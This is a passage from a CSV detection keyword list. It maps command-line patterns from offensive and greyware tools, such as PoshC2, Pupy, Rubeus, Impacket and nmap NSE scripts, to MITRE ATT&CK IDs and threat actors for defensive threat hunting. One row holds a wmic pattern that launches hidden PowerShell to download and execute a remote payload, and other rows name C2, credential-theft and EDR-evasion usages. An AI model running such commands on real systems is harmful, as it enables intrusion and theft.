TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"* pop3-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* pop3-capabilities.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* pop3-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* popcalc.bin *","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"* popcalc64.bin *","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"* --port 1337*","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","10","10","471","145","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" +"* port-states.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* PoshC2 *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* -PoshC2Dir *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* -PoshC2Dir *","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. 
PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* pptp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* preauthscan /users:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* prepare.sh shell/mod_*.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"* --preset all -o syscalls_all*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" +"* --preset common -o syscalls_common*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" +"* PrincipalsAllowedToDelegateToAccount *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* Priv_Esc.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"* --priv-esc*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* process call create *cmd.exe /c powershell.exe -nop -w hidden -c *IEX ((new-object net.webclient).downloadstring('https://*","greyware_tool_keyword","wmic","Threat Actors ran the following command to download and execute a PowerShell payload","T1059.001 - T1059.003 - T1569.002 - T1021.006","TA0002 - TA0005","N/A","N/A","Collection","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* Process spawned with stolen token!*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" +"* --propagated*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* proxychains *","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" +"* ps /target:*.xml /unprotect*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* ptt /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* ptunnel-ng*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"* --publickey * --ecmdigits 25 --verbose --private*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --publickey * --uncipherfile ./ciphered\_file*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* puppet-naivesigning.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* PupyCredentials*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* pupylib.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupySocketStream*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyTCPClient*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyTCPServer*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyWebServer*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyWebSocketClient*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyWebSocketServer*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* pupyx64.lin*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* push_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* putterpanda.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"* Pwn3d!*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation 
tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* py2exe*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","0","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z" +"* pyasn1 *","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"* pyasn1.*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require 
elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"* pyLAPS.py*","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","0","N/A","9","1","50","9","2023-10-01T19:17:01Z","2021-10-05T18:35:21Z" +"* pypykatz*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"* pywsus.py *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -q -r karma.rc_.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"* qconn-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* qscan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* quake1-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* quake3-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* quake3-master-getservers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
